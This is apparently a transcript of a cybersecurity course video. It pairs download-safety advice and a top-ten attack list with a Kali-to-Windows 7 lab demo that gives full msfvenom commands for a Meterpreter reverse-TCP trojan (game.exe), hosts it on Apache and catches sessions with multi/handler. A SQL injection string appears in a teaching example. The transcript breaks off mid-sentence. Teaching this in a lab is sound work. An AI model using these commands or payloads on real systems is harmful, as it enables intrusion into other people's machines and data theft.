Be very careful when you're downloading apps, and here we mean applications on your mobile phones as well as on your computers. On your mobile phone you still have a certain level of security where you go to the Apple marketplace, or whatever it is called, or the Google marketplace, or whatever it is called, and they do have some level of control. But when you talk about Windows operating systems and you're going onto the open internet to look for different kinds of software, you have no idea whether the website that you're on is trustworthy or is hosted by a hacker with malware in that particular file that you're downloading, especially if you're downloading a pirated program. Never download a pirated program. So be very careful when you're downloading apps: when you're downloading an executable file you can upload it to virustotal.com and scan it to see whether there are any viruses or malware within it. The website also helps you analyze URLs to see if the URL itself may have anything malicious embedded, scripts or redirector scripts or things like that; so you can use that website to scan the apps that you're downloading and see if there is anything malicious about them.

Moving on to cyber crime statistics. Now this is going

to be interesting. Let's talk about how these things stand, and the percentages, in today's world. By 2020 we would have generated 300 billion passwords. Now, the human population on this planet is 7 billion; imagine 7 billion people having 300 billion passwords, and I think half the population wouldn't have access to computers or the internet either. So imagine the number of passwords that we have, and that's what makes us use easy passwords, makes us repeat those passwords, and makes us use a single password for multiple accounts, because there are just so many passwords that we have to remember. But that's the way it is, and if we want to keep ourselves secure we are responsible for it, so please be very careful with those passwords.

24,000 malicious mobile apps are blocked daily. In fact, the latest example that I can give you: I use an Android phone, and there's an application that I've always used called CamScanner, and recently, just three days back, my mobile phone started telling me that it is a malicious app. I've been using it for years now, probably three or four years, maybe more. What does the software do? You can click pictures of a document, it will automatically convert it, it will beautify it, if that's a word, convert it into a PDF, and I can then send it as an attachment via email; a very handy app for me, or it was a handy app for me, it worked beautifully. But three days back, suddenly, the Android operating system and the antivirus on my Android phone started reporting it as malicious software. So I went online and checked into it, and it seemed that over a period of time the developers changed their vision of that software and made it spyware, and there was a dropper involved within that application which would download malware from a third-party server, install it, and start spying on you and showing you malicious advertisements. So this was an existing app which was trusted over a period of years, and over a period of

time they slowly modified it into spyware. Kaspersky was the organization that detected it in the first place and then pointed it out to Google; Google took it off the Google Play market, and now there is a variant of it available, but if you look at the reviews, all of them are one star, where users have identified that there's malware now, that it spies on them, and that it actually compromised some people's data. So that's the latest example. In 2017 or 18 there were 700,000 apps during that year that were identified by Google as malicious and were deleted from Google Play. So even if they're published, there will be thousands of people who download them until the time Google realizes that it is malware and deletes it; by then you've already been compromised and there is no way to protect yourself. So be very careful when you download these applications.

In the healthcare sector, ransomware attacks will quadruple. Now, the healthcare sector is a very volatile sector: it contains a lot of private and sensitive information, health information about individuals, that can be misused by a lot of organizations, advertisers, pharmaceutical organizations, life insurance people and whatnot. So these become very lucrative targets for hackers, where if they can steal the database and sell it on the black market they will earn a lot of money. Ransomware basically works the other way around: they encrypt the data on the hospital's side and then hold the hospital to ransom to pay up. Now, you know how much hospitals earn nowadays, right? So that's a lot of money that you're looking at.

Cyber crime would cost up to six trillion dollars in 2021. Six trillion dollars, just for cyber crime; we are not talking about the income of the IT industry, we are talking about how much money we will lose to cyber crime because of the various attacks that would be carried out. 90% of hackers use encryption. Not only encryption: most of the advanced hackers will try to hide their identity by spoofing their IP addresses, MAC addresses and locations, they will use encryption and cryptography to hide their malicious software and fool the antiviruses, IDSs and IPSs, and it is a very difficult task to even identify a particular malware, analyze it, do a root cause analysis and try to figure out who the responsible hacker was. So it's a very intensive task, and most hackers go scot-free because it is very difficult to identify them.

Now let's move on to the demo. It's a very interesting demo: we are using Metasploit, which is a penetration testing tool, and

in this demo of using Metasploit we're going to try to compromise the security of a particular system. Let's discuss the demo before we start executing it. What we have done here is that we have two virtual machines on VMware Workstation, one is the Kali Linux machine and the other is a Windows 7 machine. We are going to use a penetration testing tool called Metasploit, which is available freely on Kali Linux, and we are going to use a particular payload generator in Metasploit called msfvenom. Using msfvenom we are going to create a backdoor, an executable file which will contain a trojan or a backdoor, and we're going to try to get that onto the Windows machine and see what happens when the victim executes that particular file. We're going to keep it at the basic level: we're just going to create the trojan and then execute it. In a later lecture, or in a later video, we'll see how we can mask that trojan as a legitimate looking application so that a victim can be fooled by the application that we're going to execute. So let's start with the demo.

All right, so this is the Kali Linux VM, and the other machine is a Windows 7 virtual machine. On the Kali Linux machine we are going to just open up a terminal, a regular command prompt with your regular commands, and we are going to use the msfvenom payload generator from Metasploit to create a game.exe file; the trojan will be contained within game.exe. The command goes as such: msfvenom -p, where -p is the payload (not the platform), and at this point in time we want the payload to be windows/meterpreter/reverse_tcp; then LHOST and the IP address for the local host. I'll explain the command once I've typed it. Let's just check what the IP address for this machine is, and we have 192.168.71.133, so that's what we're going to type in here: LHOST=192.168.71.133, LPORT=4444, -f exe, -a x86, and we want the output in /root/Desktop

as game.exe. So let's go through the command. msfvenom is the initiating command; it invokes the payload generator in Metasploit. -p is the payload: we want windows/meterpreter/reverse_tcp. So what is the reverse TCP here? Meterpreter gives us remote code execution: we create the payload, we execute the payload at the victim's end, and the payload then generates a connection back to us, us being the hacker's machine, and thus LHOST, the local host, is the IP address of this machine, the hacker's machine that we're using right now, which is 192.168.71.133. That's why we have typed in the local host. LPORT is the local port: on which port do we want to listen, or which port do we want the payload to connect to on the local host.

So what we're doing is this: Meterpreter gives us remote code execution; we create game.exe, we execute it at the victim's end, and it is pre-coded to connect to the local host, whose IP address is coded in there, on a particular port, which in this case is 4444. You can put in any port number you want, just ensure that the port is going to be free and is not a regularly used port, otherwise you're going to run into problems over there. At this point in time we're going to keep it as 4444. -f stands for the output format: we want an executable file. -a stands for the architecture: here the architecture is x86, which is 32-bit. And we are going to write the file to /root/Desktop; we are logged in as root, as you can see at the prompt. So when I press Enter I should see game.exe popping up right about here on my desktop, if the command is correct, which it should be, and there's game.exe. Wait for it to be compiled properly, and there you can see: platform Windows for the payload, no encoder, payload size 333 bytes and final size of the exe file 73802 bytes. So now we have created game.exe. We are not going to bind this into a legitimate-looking program and things like that; we are going to keep it simple.

So to keep it simple, what I'm going to do as a hacker is host this on a web server which is going to be on the same machine. When we say we want to host on an Apache server, the server's content lives in a directory called /var/www. So let's go there: pwd, and we can see that we are in /root; cd /var/www, and then cd html, and that is where our web content lives. What we are going to do is create a directory: mkdir shared. Run ls and you can see the shared folder right here; ls -al will give you the listing with the attributes, and we can see those attributes. We want to change these attributes, so we are going to use chmod recursively, chmod -R 755 shared, to give 755 permissions to the shared folder; since we are in the same directory we do not need to give the path for shared. Let's just verify it, and you can see the permissions have changed. Now we are going to change the ownership from root to www-data for the web hosting: chown for change ownership, recursive, chown -R www-data:www-data shared. Let's check that's been done properly, and you can see that earlier it was root root and now it is www-data www-data. So that's the directory that we have created.

Let's go back; what we want to do is copy game.exe into this folder: cp /root/Desktop/game.exe /var/www/html/shared, then cd shared, and let's see: we have game.exe right there, there it is. Now we want to start Apache: service apache2 start. So essentially what we have done is we have created a directory in the html folder to host this file, we've copied it from our desktop into the shared folder, and I'm going to pause here for a minute. All right, so we have started the service for the Apache 2 server, that means we have started the web server, we have hosted game.exe on the web server in the shared folder, and we have changed the permissions and the

ownership for the shared folder. Now we are going to go on to the Windows 7 machine, open up the browser and see whether the web server is accessible. If you remember, the IP address of that machine was 192.168.71.133 and the file was in the shared folder, so 192.168.71.133/shared, and if this is done properly we should see game.exe right here. Once we click on it, it's going to ask us whether we want to save the file, 72.1 KB; we're going to save it, and I think it just saved it here. Now, before we execute it, we are going to go back into Kali Linux and start the listener. We have created the exploit, or rather the payload, and hosted it on a web server, which means that when somebody double clicks on it the machine is going to try to create a reverse connection to our hacker's machine; but our hacker's machine needs to be configured to handle that incoming connection.

So we are going to start off with msfconsole. msfconsole is the command which starts up Metasploit. We're just going to take a minute over here; you can see it's the Metasploit Framework console. It's going to start; it does take a little while, and we're just going to wait it out. Let me turn this into full screen. I can see at the bottom here on the msf prompt that we are using Metasploit with 1699 exploits. This is not a completely updated version, the latest one would have around 1800 exploits, but the one that we want exists in this version, so we are good to go. We start off with the configuration of Metasploit to listen for that particular connection, so we say use exploit/multi/handler, and 'multi' is basically something that

works across multiple operating systems. We're going to use that module; you can see it has now opened up the handler, which we need to configure. Here we're going to set the payload that it is going to expect, the payload being windows/meterpreter/reverse_tcp: set payload windows/meterpreter/reverse_tcp. You can see that the payload has been configured. We are going to say show options, and it is going to ask us for the options for the payload, which means LHOST, the listen address, and LPORT, the listen port, and you can see we had the default, 4444, which is the default port for this handler within Metasploit. If you changed the port when you created game.exe, you need to change the port over here as well. The command here is set LHOST 192.168.71.133. Enter, and I think I made a typo; there is no equals sign in the command, that's it, and you can see now it prints lhost => 192.168.71.133 and we have set the local host. If we want to set LPORT, that's how we do it: set LPORT 4444, and there it is. So if you have changed the port in game.exe, ensure that you change the port here as well. show options, and you'll see now the data is populated over here: LHOST, the local host, is 192.168.71.133 and LPORT, the local port, is 4444.

We have configured this, and now we are just going to type exploit, and you can see that it has started the reverse TCP handler on 192.168.71.133 on port 4444. So now, when the victim, which is Windows 7, executes the file, and we say Run at the victim's end, nothing should visibly happen; it's just resolving something. At the other end you can see that a Meterpreter session has been opened, and it shows us that from the victim's IP, which is 192.168.71.129, on port 49493, we are connected to our machine. So that's the connection that has happened. Press Enter and you can see it exits the session. Let's just look at the IP address on Windows to confirm that was the same machine that we had, and that's .129 right there. Let's open up this file again and see what happens, and you can see the second session being opened up right here. Run pwd and you can see that we are sitting inside that particular machine's file system. So that's what these trojans are supposed to do: give us a backdoor entry; we are then able to connect, we are able to copy data, and we basically have a back door, so we can do anything and everything that we want to do.
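The connect-back exchange the demo just walked through, reduced to a plain TCP conversation, as an added example that is not part of the course and not Metasploit's own code. start_handler() plays the role of exploit/multi/handler (bind LHOST:LPORT and wait for one session), connect_back() plays the stager inside game.exe (open an outbound connection to the handler and identify itself), and handler_timeout_demo() shows what the handler reports when the victim never runs the file. No real payload is involved; the banner strings, the victim name and the use of 127.0.0.1 with an OS-chosen port are assumptions for the demo. The point to notice is the direction of the connection: the victim connects out to the attacker, which is why a firewall that only filters inbound traffic does not stop it, and why the port must be free on the attacker's side before the handler starts.

```python
"""Added example (not Metasploit code): the reverse-TCP connect-back
pattern behind windows/meterpreter/reverse_tcp and exploit/multi/handler,
reduced to a plain TCP exchange on 127.0.0.1.  All names, banners and
ports below are assumptions for the demo."""
import queue
import socket
import threading


def port_is_free(host: str, port: int) -> bool:
    """The course warns to pick a free port for LPORT: a refused connect
    attempt means nothing is listening there yet."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(1.0)
        return s.connect_ex((host, port)) != 0


def start_handler(lhost: str, lport: int, results: "queue.Queue", timeout: float = 5.0):
    """Bind LHOST:LPORT like multi/handler and wait for ONE connect-back.
    Returns (thread, bound_port).  The session record (peer IP, peer port,
    first line the stager sent) is delivered via `results`, or None if
    nobody connected before `timeout` seconds elapsed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((lhost, lport))          # lport=0 lets the OS choose a free port
    srv.listen(1)
    srv.settimeout(timeout)
    bound_port = srv.getsockname()[1]

    def run():
        try:
            conn, peer = srv.accept()
        except socket.timeout:
            results.put(None)         # the victim never executed the file
            return
        finally:
            srv.close()               # one session is all this demo handles
        with conn:
            conn.settimeout(timeout)
            banner = conn.recv(1024).decode(errors="replace").strip()
            conn.sendall(b"handler: session opened\n")
        results.put({"peer_ip": peer[0], "peer_port": peer[1], "banner": banner})

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return t, bound_port


def connect_back(lhost: str, lport: int, victim_name: str = "WIN7-VICTIM") -> str:
    """What the stager does when the victim runs game.exe: connect OUT to
    LHOST:LPORT, identify itself, and return the handler's reply."""
    with socket.create_connection((lhost, lport), timeout=5.0) as c:
        c.sendall(f"hello from {victim_name}\n".encode())
        return c.recv(1024).decode(errors="replace").strip()


def demo(lhost: str = "127.0.0.1", lport: int = 0):
    """Run both sides on localhost; return (session_record, stager_reply)."""
    results = queue.Queue()
    handler, port = start_handler(lhost, lport, results)
    reply = connect_back(lhost, port)
    handler.join(5.0)
    return results.get(timeout=5.0), reply


def handler_timeout_demo(timeout: float = 0.3):
    """The failure mode: handler started, victim never double-clicks."""
    results = queue.Queue()
    handler, _port = start_handler("127.0.0.1", 0, results, timeout=timeout)
    handler.join(timeout + 2.0)
    return results.get(timeout=2.0)


if __name__ == "__main__":
    session, reply = demo()
    print("handler saw :", session)
    print("stager got  :", reply)
    print("no callback :", handler_timeout_demo())
```

On the defensive side the same picture is the detection hint: the Windows 7 host in the demo opened an outbound connection from an ephemeral port (49493) to a non-standard port (4444) on another internal host, which is the kind of flow egress filtering and NetFlow-style monitoring are meant to surface.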

Just as the COVID-19 situation is affecting various domains, it is also adversely affecting cyber security. Interpol states that attackers are attacking the computer networks and systems of businesses, individuals and big global organizations, and due to the shift of focus to the COVID crisis, cyber security is taking a huge brunt. Even the WHO has stated that since the beginning of this pandemic it has witnessed a sky-high increase in the number of cyber attacks; there are fake emails doing the rounds in which scammers are impersonating the WHO. Reports also state that the financial services sector is increasingly being targeted during the COVID-19 coronavirus pandemic: various banks and financial institutions have witnessed a spike in the number of cyber attacks in the last few months, and several banks are increasing cyber attack awareness amongst their customers and asking them not to disclose any confidential information to a third party.

Now that we have an idea of how cyber attacks can affect us, let's go ahead and understand the meaning of a cyber threat. A cyber threat is a warning which allows you to prepare against a cyber attack. When there is unauthorized access by a third party to your system and network, it is termed a cyber attack; the person who carries this out is termed a hacker, an attacker or a cyber criminal, and the possibility of such an attack is termed a cyber threat. As we saw previously, cyber attacks lead to data breaches, which result in either data manipulation or loss of highly confidential data. They also result in financial losses, which in turn have a colossal impact on businesses. In addition to these losses, a lot of companies face reputational damage as well: trust plays a vital role when it comes to customer relationships, and cyber attacks can hamper an organization's reputation and erode the customer's trust.

Let’s now get an understanding of the most common cyber attacks. Here we will look into the top 10 cyber threats in today’s times. First up we have the malware attack. This is a very common form of cyber attack. The term malware refers to malicious software viruses, including spyware, worms, ransomware, adware and Trojans.

A Trojan virus is a form of malware that disguises itself as legitimate software. Ransomware blocks access to the key components of the network, whereas spyware, as the name suggests, is software that steals your confidential data without your knowledge. Coming to adware, it is also software, but this software displays advertising

content such as banners or pop-ups on a user’s screen. Malware breaches a network through a vulnerability. It usually happens when the victim clicks a dangerous link or downloads an email attachment, or also when an infected pen drive is used. Let’s now have a look at the ways in

which we can prevent a malware attack. First and foremost, you should use some kind of antivirus software. This step might be something that you have heard time and again, but it is a very effective way to prevent a malware attack. Antivirus software is a program that can

protect your computer against the above-mentioned viruses. This data security utility installed on a computer can prevent a malware attack. A few of the popular antivirus software are Avast Antivirus, Norton Antivirus and McAfee Antivirus. Secondly, you should use firewalls. A firewall helps prevent unauthorized access, viruses and other malicious

activities that occur over the internet. As the name suggests, it acts as a wall between your system and the internet. It filters the traffic that is allowed to enter your device. Windows and Mac OS X have their default built-in firewalls, named Windows Firewall and Mac Firewall respectively.

Apart from this, in order to prevent attacks on your network, your router should also have a firewall built in. Thirdly, you should always stay alert and avoid clicking on suspicious links. The links might look legitimate, but they can be home to malware which is going to enter your system and cause havoc. Lastly, it is wise to update operating systems and browsers regularly. If this

is not done, cyber criminals can exploit these vulnerabilities and attack your system. That was all about preventing a malware attack. Let’s move on to the next attack: the phishing attack. It is one of the biggest and most widespread types of cyber attacks. As per reports, phishing accounts for over 12 billion

dollars in business losses. So what is a phishing attack? It is an attack wherein an attacker impersonates a trusted contact and sends the victim fake emails. Unaware of this, the victim opens the email and clicks on the malicious link or opens the attachment in the mail.

The aim of such an attack is to gain access to confidential information and account credentials. Hackers can also install malware through a phishing attack. This attack is growing bigger each day as attackers are becoming more convincing in pretending to be a trusted source. For example, you might get an email from

Apple stating that your Apple account has been put on hold for security reasons, and the mail will ask you to type in your login credentials in order to restore your account. Do not fall for that, as it is a phishing email. Legitimate sources will not randomly send you mails and ask for your account

credentials. Phishing is a type of social engineering attack. Social engineering attacks refer to several malicious activities that are accomplished through human interactions. It manipulates the victim in such a way that he or she ends up divulging personal information. Such an attack can happen on any platform, such as text

messages or even social media sites. Similar to phishing, you also have voice phishing, known as vishing. Vishing will be carried out over voicemail, a mobile phone or even landlines. So how do we prevent a phishing attack? Human error is the reason for a high

percentage of cyber attacks. To prevent a phishing attack, the wisest way will be to scrutinize the emails you receive. A phishing email will have some spelling mistakes or a format change from that of the legitimate source it is pretending to come from. Look for these loopholes and do not click on any suspicious emails.
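The advice above (check who the mail really comes from, look for a format that differs from the legitimate source, and do not click links on trust) can be mechanised. The Python below is an added example and not the course’s own tooling: it scores a raw email for the indicators just described, using a constructed message modelled on the “your Apple account is on hold” lure and a second constructed benign message for comparison. The brand-to-domain table, the urgency phrase list and the two-indicator decision rule are assumptions for the example.

```python
"""Heuristic phishing scrutiny of a raw email message.

Added example, not the course's own tooling. The two messages are constructed
sample data; the brand-to-domain table and phrase list are assumptions.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from typing import Dict, List, Set
from urllib.parse import urlparse

# Assumed: brands that appear in display names and the domains that send for them.
TRUSTED_SENDER_DOMAINS: Dict[str, Set[str]] = {
    "apple": {"apple.com", "email.apple.com"},
    "paypal": {"paypal.com"},
}
URGENCY_PHRASES = ("on hold", "suspended", "verify your", "within 24 hours", "immediately")

# Constructed sample modelled on the "your Apple account is on hold" lure.
SAMPLE_PHISH = """\
From: "Apple Support" <support@apple-id-verify-center.com>
To: victim@example.org
Subject: Your Apple account has been placed on hold
Content-Type: text/html

<html><body>
<p>Dear Custmer, your Apple account is on hold for security reasons.</p>
<p>Please <a href="http://203.0.113.9/login">sign in at https://appleid.apple.com</a>
to restore your account immediately.</p>
</body></html>
"""

# Constructed benign sample for comparison.
SAMPLE_LEGIT = """\
From: "Example Newsletter" <news@example.org>
To: victim@example.org
Subject: Weekly digest
Content-Type: text/html

<html><body><p>Here is this week's digest. <a href="https://example.org/digest">Read it</a></p></body></html>
"""

LINK_RE = re.compile(r'<a\s+href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
IPV4_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


def sender_domain(header_value: str) -> str:
    """Domain of the address inside a From header, lowercased."""
    _, addr = parseaddr(header_value)
    return addr.rpartition("@")[2].lower()


def phishing_indicators(raw_message: str) -> List[str]:
    """Return human-readable indicators found in the message (empty list = none)."""
    msg = message_from_string(raw_message)
    indicators: List[str] = []
    display_name, _ = parseaddr(msg.get("From", ""))
    domain = sender_domain(msg.get("From", ""))
    payload = msg.get_payload()
    body = payload if isinstance(payload, str) else ""

    # 1. Display name claims a brand, but the address is not one of that brand's domains.
    for brand, domains in TRUSTED_SENDER_DOMAINS.items():
        if brand in display_name.lower() and domain not in domains:
            indicators.append(f"display name claims {brand!r} but sender domain is {domain!r}")

    # 2. Pressure to act now, in subject or body.
    text = (msg.get("Subject", "") + " " + body).lower()
    hits = [p for p in URGENCY_PHRASES if p in text]
    if hits:
        indicators.append("urgency language: " + ", ".join(hits))

    # 3. Links whose visible text names one host while the href goes elsewhere,
    #    and links that point at a bare IP address.
    for href, label in LINK_RE.findall(body):
        href_host = (urlparse(href).hostname or "").lower()
        shown = re.search(r"https?://([\w.-]+)", label)
        if shown and shown.group(1).lower() != href_host:
            indicators.append(f"link text shows {shown.group(1)} but href goes to {href_host}")
        if IPV4_RE.fullmatch(href_host):
            indicators.append(f"link points at bare IP address {href_host}")
    return indicators


def is_likely_phishing(raw_message: str, min_indicators: int = 2) -> bool:
    """Assumed decision rule: two or more independent indicators."""
    return len(phishing_indicators(raw_message)) >= min_indicators


if __name__ == "__main__":
    for name, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, is_likely_phishing(sample), phishing_indicators(sample))
```

The checks are deliberately independent of each other: a lure that gets the sender domain right can still trip on the link mismatch, and one with no links still trips on the brand/domain mismatch, which is why the decision rule counts indicators rather than looking for any single one.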

Next, you can also make use of an anti-phishing toolbar. Sometimes, when it is impossible to identify a phishing email, this toolbar is helpful. It has a tool that provides you with anti-phishing solutions and information about the website you are browsing. They prevent fraudulent websites from masquerading as other legitimate

websites. For example, Avast Online Security is a good anti-phishing toolbar you can get. You should also make it a habit to update your passwords regularly. This way, even if your old password is known to a third party, it will still be invalid. Let’s now move on to the next type of

cyber attack, that is the password attack. This is a form of attack most of us might have experienced at some point in time. Imagine when you try to log into an account and it says incorrect password. In such a scenario, it is possible that an outsider has managed to either guess

or steal your password. By doing so, all your data is compromised. A hacker can crack your password with the help of various programs and password cracking tools like Aircrack-ng, Cain and Abel, John the Ripper, Hashcat and so on. There are different types of password attacks. A brute force attack happens when the

hacker tries to log in with all possible password combinations. Meanwhile, in the dictionary attack, a list of common passwords is used to crack the user’s login credentials. Next is a keylogger attack. Keystroke logging records the keys struck on a keyboard by the victim, and the victim is totally unaware of this. This keylogger,

or keystroke recorder, can be either hardware or software. As for how one can prevent password attacks, it is crucial that you use strong alphanumeric passwords. Incorporate special characters in your passwords as well. It is to be noted that you shouldn’t be using the same password for multiple

websites or accounts. Also make sure not to use easily guessable passwords, which include your name, your family members’ names or even your date of birth. Needless to say, update your passwords regularly. This will limit your exposure to a password attack. The next tip is something we should all

be careful about. Often we make complicated passwords and, to remember them, we note them down somewhere or keep some sort of password hint in the open. This shouldn’t be done, as it can prove to be a gateway to an attack, since a third party can misuse your

account with the help of your password hint. Let’s now move on and have a look at the fourth type of cyber attack on our list, that is the man-in-the-middle attack. As you can see on your screens, we have the client on the left, the server on the

right and the hacker below. Now you can see that the client-server communication has been cut off, and instead the communication line now goes through the hacker. So let’s elaborate on this. A man-in-the-middle attack is also known as an eavesdropping attack. It takes place when an attacker comes in between a

two-party communication. In other words, the attacker hijacks the session between a client and host. So what do they gain by interrupting the session? Well, they are able to steal and also filter data. Imagine you are logging into your bank account; in such a state, a

man-in-the-middle attack can be used to obtain information related to your bank account. Let’s now have a look at how we can prevent a man-in-the-middle attack. Firstly, you should be aware of the security of the website you are using, and it is advised to use encryption on

all devices that contain crucial data. Using unsecured public Wi-Fi can help attackers carry out the man-in-the-middle attack; hence it is suggested that you avoid using public Wi-Fi to carry out important work. The next attack that we will be talking about is the SQL injection attack. A Structured Query Language (SQL)

injection occurs in a database-driven website when the hacker manipulates a standard SQL query. This attack can be carried out by submitting malicious code into a vulnerable website search box, thereby making the server reveal information. The outcome of this attack is that the attacker is able to view, edit and delete

tables in the databases. In addition to this, the attackers can also obtain administrator rights. An SQL attack manipulates data and accesses confidential information. In order to prevent a SQL injection attack, you should use an intrusion detection system. An IDS is designed to detect unauthorized access to a system.
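To make the search-box case above concrete, here is an added example that is not from the course: the same product search written once with string formatting, which lets the input rewrite the query itself, and once as a parameterized query, which keeps the input as data. It also shows the input-validation step the tutorial recommends as an allow-list check. Everything runs against an in-memory SQLite table with constructed rows, and INJECTED_TERM is a constructed sample input.

```python
"""SQL injection: the vulnerable search beside its parameterized fix.

Added example, not the course's own code. Runs against an in-memory SQLite
table with constructed rows; INJECTED_TERM is a constructed sample input.
"""
import sqlite3
from typing import List

# Constructed sample input of the kind the tutorial describes: it closes the
# quoted string and comments out the rest of the WHERE clause.
INJECTED_TERM = "' OR 1=1 --"


def build_demo_db() -> sqlite3.Connection:
    """Constructed catalogue: two public products and one flagged as secret."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, secret INTEGER)")
    conn.executemany(
        "INSERT INTO products (name, secret) VALUES (?, ?)",
        [("keyboard", 0), ("mouse", 0), ("unreleased phone", 1)],
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[str]:
    """Builds the query with string formatting: user input becomes part of the SQL."""
    query = f"SELECT name FROM products WHERE name LIKE '%{term}%' AND secret = 0"
    return [row[0] for row in conn.execute(query)]


def search_safe(conn: sqlite3.Connection, term: str) -> List[str]:
    """Parameterized: the driver passes the value separately, so it can never become SQL."""
    query = "SELECT name FROM products WHERE name LIKE ? AND secret = 0"
    return [row[0] for row in conn.execute(query, (f"%{term}%",))]


def validate_search_term(term: str, max_len: int = 40) -> str:
    """Allow-list validation: only values that pass are processed further.

    Assumed rule for this catalogue: letters, digits and spaces only, bounded length.
    Validation is a second layer, not a replacement for parameterized queries.
    """
    if not term or len(term) > max_len or not all(c.isalnum() or c == " " for c in term):
        raise ValueError("search term contains characters outside the allowed set")
    return term


if __name__ == "__main__":
    db = build_demo_db()
    print("normal search:", search_safe(db, "mouse"))
    print("injected, vulnerable:", search_vulnerable(db, INJECTED_TERM))
    print("injected, parameterized:", search_safe(db, INJECTED_TERM))
    try:
        validate_search_term(INJECTED_TERM)
    except ValueError as exc:
        print("validation rejected it:", exc)
```

The vulnerable version returns the secret row because the `AND secret = 0` filter was commented away; the parameterized version searches for the literal text and finds nothing. Validation rejects the input before it ever reaches the database, but an allow-list that is too strict for a real search field is why the parameterized query, not the validation, is the primary control.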

It is used together with a firewall and a router; this way unwanted requests can be filtered out. The next step is to carry out validation of the user-supplied data. There is code developed to identify illegal user inputs. The validation process helps in verifying

whether or not the type of user input is allowed. This way, only the value which passes the validation will be processed. That was all about the SQL injection attack. So now that we have reached midway, I’d like to remind you all to feel free to

leave your questions in our chat section, and we will be happy to answer them. Without further ado, let’s go back to our list of the top cyber security threats. At number 6 we have the denial of service attack. This is a type of attack that proves to

be a major threat to companies. In this attack, malicious parties target systems, servers or networks and then flood them with traffic so as to exhaust their resources and bandwidth. As a result, the server is unable to handle incoming requests, resulting in the website it hosts either slowing down or shutting

down. This leaves legitimate service requests unattended. It is known as distributed denial of service (DDoS) when attackers use multiple compromised systems to launch this attack. Like I mentioned earlier, the DDoS attack is a major threat to organizations. Let’s have a look at one such DDoS attack. In February 2018 the famous United

States-based global company GitHub revealed that it was hit with a distributed denial of service (DDoS) attack. This DDoS attack is considered to be the world’s largest DDoS attack. As you might be aware, GitHub is a developer platform used by millions all over the world; hence it always has high traffic and usage.

But this time it wasn’t just high traffic but a whopping 1.35 terabits per second, sending packets at a rate of 126.9 million per second. These figures speak for themselves. Fortunately, GitHub was running a DDoS protection service which was automatically alerted within 10 minutes of the start of the attack.

This attack only took GitHub’s systems down for about 15 to 20 minutes. GitHub was able to stop the attack quickly only because it utilized the DDoS mitigation service that helped in detecting the attack and which further helped in quickly taking the necessary steps to minimize the impact.

Let’s now have a look at how to prevent a DDoS attack. Firstly, to stop a DDoS attack, you are required to identify the malicious traffic. This can be made possible by running a traffic analysis. Also remember to comprehend the warning signs. A few symptoms of a DDoS attack include network slowdown, intermittent website shutdowns, etc.

If anything seems irregular and unusual, then the organization should do the needful. Secondly, understand that every organization can face a DDoS attack, and be ready with a prevention plan, as there won’t be any time to prepare one when it hits. For this purpose, develop an incident response plan, have a checklist and make

sure your team and data center are prepared. If you are well prepared, you can tackle a DDoS attack smoothly, like GitHub did. Lastly, the conventional DDoS mitigation solutions oversize the network bandwidth and require complex hardware, which proves to be costly and also ineffective, whereas the cloud has greater bandwidth and resources.

It is also to be noted that cloud-based apps can absorb malicious traffic way before it reaches its intended destination. Hence it is good to outsource DDoS prevention to cloud-based service providers. That was all about the DDoS attack. Now let’s look at number seven, and here we have the insider threat.

An insider threat, as the name suggests, is one that does not involve a third party but an insider. It could be someone from the organization who knows everything about the organization. It could be current employees, former employees, contractors or even associates. These threats have the potential to cause huge damage.

Research shows that insider threats are growing in small businesses, as employees have access to multiple accounts that have a lot of data. The individuals who misuse this data can put everyone else at risk. The reasons for such security breaches are many: it can be due to malice, greed or even carelessness.

Such a threat is quite tricky, as these attacks are hard to predict. In order to prevent the insider threat attack, thorough preparation is required. Organizations should make sure that they have a good culture of security awareness. Businesses can limit the IT resources a user can have access to depending on

their job roles; this way the damage or cost can be minimized. All the employees should be trained to identify insider threats, and this way employees can understand when an attacker has manipulated or is attempting to misuse the company data. Next up on our list is cryptojacking, which is at number eight.

I’m sure most of you are aware of the word cryptocurrency. Cryptojacking is related to cryptocurrency. You must be wondering how. Let’s understand what cryptojacking is. Cryptojacking takes place when attackers make their way into someone else’s computer to mine cryptocurrency. This is done by infecting a website or

by manipulating the victim into clicking on a malicious link, which in turn loads crypto-mining code on the computer. It is also done through online ads with JavaScript code that will auto-execute once loaded in the victim’s browser. Victims are unaware of this, as the crypto-mining code works in the background.

The only sign they might witness is a delay in the execution. Crypto mining is a form of obtaining cryptocurrency. Crypto mining by itself is an immense process; that is the reason attackers make use of other computers in order to cryptomine. Let’s have a look at ways to prevent

cryptojacking. It is advised that you keep all security apps and software updated to the latest versions, as cryptojacking can infect the most unprotected systems. It is also good to have cryptojacking awareness training and give tips to employees as to how to detect cryptojacking threats. Make sure to

inform them about the risks of opening emails from unknown senders and clicking on attachments. Ads are a primary source of cryptojacking scripts; therefore it’s good to install an ad blocker and also have extensions like MinerBlock, which is used to detect and block crypto-mining scripts.

Moving on to number 9 on our list, we have the zero-day exploit. A zero-day exploit occurs after the announcement of a network vulnerability. Usually the vendor becomes aware of a vulnerability, but a solution to it is still not available for the same. Hence the vendor announces the vulnerability

so that the users are aware of it, but this also makes the attackers aware of it. The vendor or the developer could take any amount of time to find a solution; it could vary from a few hours to days to months depending on the vulnerability. In the meantime, the attackers target the

disclosed vulnerability. They exploit the vulnerability even before a patch or a solution is implemented. Speaking of ways to prevent a zero-day exploit, organizations should have a well-communicated patch management process. It is also crucial to use management solutions to automate the procedures; thus it avoids delays in deployment. Having an incident response plan helps

in dealing with a cyber attack. You need to have a plan primarily looking into zero-day attacks. In case of an attack, this plan will keep you prepared and will allow you to avoid or reduce the damage. Finally, at number 10 we have the watering hole attack.

Generally, in a watering hole attack the victim is of a specific group. It could be either victims of an organization, or a region, or so on. Here the attacker targets the websites which are frequently used by the particular group. They identify these websites either by guesswork or by closely monitoring the group,

